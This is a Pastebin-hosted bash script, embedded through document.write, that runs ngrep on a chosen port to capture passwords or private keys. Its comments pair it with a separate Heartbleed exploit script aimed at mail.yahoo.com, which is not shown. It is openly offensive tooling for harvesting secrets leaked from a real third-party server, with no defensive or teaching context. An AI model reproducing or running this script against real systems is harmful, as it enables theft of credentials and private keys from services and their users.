document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #! /bin/bash
  2.  
  3. # Usage : sudo ./ngrep-heartbleed.sh "pass|privte key" 443
  4. #$1 = the string to search
  5. #$2 = the port to monitor
  6.  
  7. # On the other terminal, run ./exploit-heartbleed.sh mail.yahoo.com
  8.  
  9. ngrep -i "$1" -d any port $2 -q
');